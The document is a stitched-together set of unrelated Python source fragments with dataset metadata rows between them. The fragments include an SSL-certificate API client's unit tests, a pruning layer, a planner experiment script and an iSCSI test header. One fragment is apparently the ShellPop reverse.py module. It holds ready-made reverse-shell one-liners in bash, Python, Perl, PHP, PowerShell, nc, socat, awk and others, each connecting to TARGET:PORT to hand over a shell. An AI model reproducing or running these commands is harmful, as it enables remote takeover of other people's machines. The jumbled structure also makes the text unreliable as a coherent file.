# Set up parameter values
custom_cert_id = 'testString'
# Invoke method
response = service.delete_custom_certificate(
custom_cert_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_delete_custom_certificate_required_params()
#--------------------------------------------------------
@responses.activate
def test_delete_custom_certificate_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
custom_cert_id = 'testString'
# Invoke method
response = service.delete_custom_certificate(
custom_cert_id
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_certificate_priority
#-----------------------------------------------------------------------------
class TestChangeCertificatePriority():
#--------------------------------------------------------
# change_certificate_priority()
#--------------------------------------------------------
@responses.activate
def test_change_certificate_priority_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/prioritize'
responses.add(responses.PUT,
url,
status=200)
# Construct a dict representation of a CertPriorityReqCertificatesItem model
cert_priority_req_certificates_item_model = {
'id': '5a7805061c76ada191ed06f989cc3dac',
'priority': 1
}
# Set up parameter values
certificates = [cert_priority_req_certificates_item_model]
# Invoke method
response = service.change_certificate_priority(
certificates=certificates,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['certificates'] == certificates
#--------------------------------------------------------
# test_change_certificate_priority_required_params()
#--------------------------------------------------------
@responses.activate
def test_change_certificate_priority_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_certificates/prioritize'
responses.add(responses.PUT,
url,
status=200)
# Invoke method
response = service.change_certificate_priority()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_universal_certificate_setting
#-----------------------------------------------------------------------------
class TestGetUniversalCertificateSetting():
#--------------------------------------------------------
# get_universal_certificate_setting()
#--------------------------------------------------------
@responses.activate
def test_get_universal_certificate_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
mock_response = '{"result": {"enabled": true}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_universal_certificate_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_universal_certificate_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_universal_certificate_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
mock_response = '{"result": {"enabled": true}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_universal_certificate_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_universal_certificate_setting
#-----------------------------------------------------------------------------
class TestChangeUniversalCertificateSetting():
#--------------------------------------------------------
# change_universal_certificate_setting()
#--------------------------------------------------------
@responses.activate
def test_change_universal_certificate_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
responses.add(responses.PATCH,
url,
status=200)
# Set up parameter values
enabled = True
# Invoke method
response = service.change_universal_certificate_setting(
enabled=enabled,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['enabled'] == enabled
#--------------------------------------------------------
# test_change_universal_certificate_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_change_universal_certificate_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
responses.add(responses.PATCH,
url,
status=200)
# Invoke method
response = service.change_universal_certificate_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_tls12_setting
#-----------------------------------------------------------------------------
class TestGetTls12Setting():
#--------------------------------------------------------
# get_tls12_setting()
#--------------------------------------------------------
@responses.activate
def test_get_tls12_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
mock_response = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_tls12_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_tls12_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_tls12_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
mock_response = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_tls12_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_tls12_setting
#-----------------------------------------------------------------------------
class TestChangeTls12Setting():
#--------------------------------------------------------
# change_tls12_setting()
#--------------------------------------------------------
@responses.activate
def test_change_tls12_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
mock_response = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
value = 'on'
# Invoke method
response = service.change_tls12_setting(
value=value,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['value'] == value
#--------------------------------------------------------
# test_change_tls12_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_change_tls12_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
mock_response = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.change_tls12_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_tls13_setting
#-----------------------------------------------------------------------------
class TestGetTls13Setting():
#--------------------------------------------------------
# get_tls13_setting()
#--------------------------------------------------------
@responses.activate
def test_get_tls13_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
mock_response = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_tls13_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_tls13_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_tls13_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
mock_response = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.get_tls13_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_tls13_setting
#-----------------------------------------------------------------------------
class TestChangeTls13Setting():
#--------------------------------------------------------
# change_tls13_setting()
#--------------------------------------------------------
@responses.activate
def test_change_tls13_setting_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
mock_response = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
value = 'on'
# Invoke method
response = service.change_tls13_setting(
value=value,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['value'] == value
#--------------------------------------------------------
# test_change_tls13_setting_required_params()
#--------------------------------------------------------
@responses.activate
def test_change_tls13_setting_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
mock_response = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
responses.add(responses.PATCH,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.change_tls13_setting()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# endregion
##############################################################################
# End of Service: SSLCertificate
##############################################################################
| 42.036275
| 557
| 0.515101
| 3,800
| 42,877
| 5.590263
| 0.065263
| 0.029374
| 0.016476
| 0.038413
| 0.903215
| 0.900956
| 0.881231
| 0.846396
| 0.795886
| 0.783835
| 0
| 0.028942
| 0.227208
| 42,877
| 1,019
| 558
| 42.077527
| 0.612162
| 0.269305
| 0
| 0.766409
| 0
| 0.050193
| 0.324554
| 0.102618
| 0
| 0
| 0
| 0
| 0.160232
| 1
| 0.065637
| false
| 0
| 0.013514
| 0
| 0.111969
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e467a1ed5b4e7e91875d972b5c92dc92b1a7b3
| 2,676
|
py
|
Python
|
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
def add_linear_layer_parameters(layer,config=None):
layer.mask = nn.Parameter(config['init_value'] * torch.ones_like(layer.weight), requires_grad=True)
layer.scaling_param = nn.Parameter(torch.tensor(1.0),requires_grad=True)
if config["signed_constant"]:
with torch.no_grad():
layer_weight_std = torch.std(layer.weight)
layer.weight.copy_(torch.sign(layer.weight)*torch.ones_like(layer.weight)*layer_weight_std)
def add_conv_layer_parameters(layer,config=None):
layer.mask = nn.Parameter(config['init_value'] * torch.ones_like(layer.weight), requires_grad=True)
layer.scaling_param = nn.Parameter(torch.tensor(1.0),requires_grad=True)
if config["signed_constant"]:
with torch.no_grad():
layer_weight_std = torch.std(layer.weight)
layer.weight.copy_(torch.sign(layer.weight)*torch.ones_like(layer.weight)*layer_weight_std)
def linear_layer_forward(layer,input):
proba_leave = torch.zeros_like(layer.mask)
# Stack probabilities
log_proba_tensor = torch.stack((layer.mask,proba_leave))
# # Sample masks according to probabilities
sampled_tensor = torch.nn.functional.gumbel_softmax(log_proba_tensor,
hard=layer.config.get("hard_gumbel",True),
tau=layer.config.get("gumbel_tau",1),
dim=0)
# Mask the weights to create hat_weight
if layer.config.get("weight_rescale",False):
hat_weight = layer.scaling_param * layer.weight * sampled_tensor[0]
else :
hat_weight = layer.weight * sampled_tensor[0]
return F.linear(input, hat_weight, layer.bias)
def conv_layer_forward(layer,input):
proba_leave = torch.zeros_like(layer.mask)
# # Stack probabilities
log_proba_tensor = torch.stack((layer.mask,proba_leave))
# Sample masks according to probabilities
sampled_tensor = torch.nn.functional.gumbel_softmax(log_proba_tensor,
hard=layer.config.get("hard_gumbel",True),
tau=layer.config.get("gumbel_tau",1),
dim=0)
# Mask the weights to create hat_weight
if layer.config.get("weight_rescale",False):
hat_weight = layer.scaling_param * layer.weight * sampled_tensor[0]
else :
hat_weight = layer.weight * sampled_tensor[0]
return layer._conv_forward(input, hat_weight)
| 43.16129
| 103
| 0.635277
| 332
| 2,676
| 4.891566
| 0.195783
| 0.121921
| 0.062808
| 0.044335
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0
| 0.006094
| 0.2642
| 2,676
| 61
| 104
| 43.868852
| 0.81869
| 0.073617
| 0
| 0.780488
| 0
| 0
| 0.048583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58026c332961a43a7d65ccfeba2878c28df582de
| 428
|
py
|
Python
|
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | 1
|
2021-02-03T11:07:05.000Z
|
2021-02-03T11:07:05.000Z
|
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | null | null | null |
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | null | null | null |
from recbole.data.dataset.dataset import Dataset
from recbole.data.dataset.sequential_dataset import SequentialDataset
from recbole.data.dataset.kg_dataset import KnowledgeBasedDataset
from recbole.data.dataset.social_dataset import SocialDataset
from recbole.data.dataset.kg_seq_dataset import Kg_Seq_Dataset
from recbole.data.dataset.xgboost_dataset import XgboostDataset
from recbole.data.dataset.customized_dataset import *
| 53.5
| 69
| 0.883178
| 57
| 428
| 6.473684
| 0.263158
| 0.208672
| 0.284553
| 0.417344
| 0.287263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065421
| 428
| 7
| 70
| 61.142857
| 0.9225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ed575a35a029fab0ce40bba1e8680698eec28209
| 191
|
py
|
Python
|
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
from typing import List
from src.interpreter.expression import Expression
def repeat(block: List, codebase):
return str(Expression(block[1], codebase)) * Expression(block[2], codebase)
| 27.285714
| 79
| 0.769634
| 25
| 191
| 5.88
| 0.6
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011976
| 0.125654
| 191
| 6
| 80
| 31.833333
| 0.868263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9c31f1f2fb4e96be208860fdaa1d79a86c70215d
| 5,075
|
py
|
Python
|
src/reverse.py
|
bradfireborn/ShellPop
|
34edbd2224bd4116dbf8d09a9add0d102ab82dd3
|
[
"MIT"
] | 1
|
2021-06-11T19:07:24.000Z
|
2021-06-11T19:07:24.000Z
|
src/reverse.py
|
bluuberry/ShellPop
|
c7240755c2eb1c15acc3383766de49c2c04bcf4b
|
[
"MIT"
] | null | null | null |
src/reverse.py
|
bluuberry/ShellPop
|
c7240755c2eb1c15acc3383766de49c2c04bcf4b
|
[
"MIT"
] | 1
|
2018-06-23T02:11:22.000Z
|
2018-06-23T02:11:22.000Z
|
#!/usr/bin/env python
from binary import WINDOWS_NCAT, binary_to_bat, shellcode_to_ps1
def REV_PYTHON_TCP():
return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
def REV_PYTHON_UDP():
return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
def REV_PHP_TCP():
return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('/bin/sh -i <&3 >&3 2>&3');" """
def REV_RUBY_TCP():
return """ruby -rsocket -e "exit if fork;c=TCPSocket.new('TARGET','PORT');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" """
def REV_PERL_TCP():
return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" """
def REV_PERL_TCP_2():
return r"""perl -MIO -e "\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,'TARGET:PORT');STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;" """
def REV_PERL_UDP():
return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(PeerAddr => "TARGET:PORT",Proto => "udp"); $s->send("SHELLPOP PWNED!\n");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'"""
def BASH_TCP():
return """/bin/bash -i >& /dev/tcp/TARGET/PORT 0>&1"""
def REV_POWERSHELL_TCP():
return """powershell -nop -ep bypass -Command '$ip="TARGET";$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\" + $env:username + \\" on \\" + $env:computername + \\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$stream.Write($sendbytes,0,$sendbytes.Length);$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"PS \\" + (Get-Location).Path + \\"> \\");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -command $returndata 2>&1 | Out-String ) } catch { Write-Warning \\"Something went wrong with execution of command on the target.\\"; Write-Error $_; }; $sendback = $result + \\"PS \\" + (Get-Location).Path + \\"> \\"; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };'"""
def REVERSE_TCLSH():
return """echo 'set s [socket TARGET PORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh"""
def REVERSE_NCAT():
return "ncat TARGET PORT -e /bin/bash"
def REVERSE_NC_TRADITIONAL_1():
return "nc TARGET PORT -c /bin/bash"
def REVERSE_NC_UDP_1():
return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { bash -i; } > fifo"""
def REVERSE_MKFIFO_NC():
return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET PORT > /tmp/f"
def REVERSE_MKNOD_NC():
return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"
def REVERSE_MKFIFO_TELNET():
return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet TARGET PORT > /tmp/f"
def REVERSE_MKNOD_TELNET():
return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"
def REVERSE_SOCAT():
return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane"""
def REVERSE_AWK():
return """awk 'BEGIN {s = "/inet/tcp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null"""
def REVERSE_AWK_UDP():
return """awk 'BEGIN {s = "/inet/udp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null"""
def REVERSE_WINDOWS_NCAT_TCP():
return """{0}\ncertutil -decode %Temp%\\nc.b64 %Temp%\\nc.exe\n%Temp%\\nc.exe -e cmd.exe TARGET PORT\ndel %Temp%\\nc.exe\n""".format(binary_to_bat(WINDOWS_NCAT, file="%Temp%\\nc.b64"))
def REVERSE_WINDOWS_BLOODSEEKER_TCP():
return """ Custom Shell requires a Custom code. """
| 74.632353
| 1,233
| 0.639606
| 824
| 5,075
| 3.864078
| 0.253641
| 0.025126
| 0.013191
| 0.024497
| 0.411118
| 0.349874
| 0.315955
| 0.268844
| 0.261621
| 0.261621
| 0
| 0.016226
| 0.113498
| 5,075
| 68
| 1,234
| 74.632353
| 0.691487
| 0.003941
| 0
| 0
| 0
| 0.4
| 0.808111
| 0.268051
| 0
| 0
| 0
| 0
| 0
| 1
| 0.488889
| true
| 0.022222
| 0.066667
| 0.488889
| 1.044444
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9c33948a84130176bf136241dc9ba2d55c963d5e
| 2,834
|
py
|
Python
|
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | 4
|
2019-04-23T10:41:35.000Z
|
2019-10-27T05:14:42.000Z
|
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | null | null | null |
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | 4
|
2018-01-16T00:00:22.000Z
|
2019-11-01T23:35:01.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from downward import suites
import common_setup
REVS = ["issue548-base", "issue548-v1"]
LIMITS = {"search_time": 1800}
SUITE = suites.suite_optimal_with_ipc11()
B_CONFIGS = {
'rl-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
'cggl-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
'dfp-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
}
G_CONFIGS = {
'rl-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
'cggl-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
'dfp-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
}
F_CONFIGS = {
'rl-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
'cggl-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
'dfp-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
}
CONFIGS = dict(B_CONFIGS)
CONFIGS.update(G_CONFIGS)
CONFIGS.update(F_CONFIGS)
exp = common_setup.IssueExperiment(
search_revisions=REVS,
configs=CONFIGS,
suite=SUITE,
limits=LIMITS,
test_suite=['depot:pfile1'],
processes=4,
email='silvan.sievers@unibas.ch',
)
exp.add_comparison_table_step()
exp()
| 64.409091
| 273
| 0.801341
| 380
| 2,834
| 5.631579
| 0.215789
| 0.117757
| 0.06729
| 0.079907
| 0.808411
| 0.808411
| 0.808411
| 0.808411
| 0.808411
| 0.802804
| 0
| 0.023907
| 0.055399
| 2,834
| 43
| 274
| 65.906977
| 0.775495
| 0.015173
| 0
| 0
| 0
| 0.264706
| 0.770886
| 0.702402
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
131ad0751ec5ad1876c4521117a125e588c6de79
| 18,187
|
py
|
Python
|
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from ironic_lib import disk_utils
from oslo_concurrency import processutils
from ironic_python_agent import errors
from ironic_python_agent.extensions import iscsi
from ironic_python_agent import hardware
from ironic_python_agent.tests.unit import base
from ironic_python_agent import utils
class FakeAgent(object):
iscsi_started = False
def get_node_uuid(self):
return 'my_node_uuid'
@mock.patch.object(disk_utils, 'destroy_disk_metadata', autospec=True)
@mock.patch.object(hardware, 'dispatch_to_managers', autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
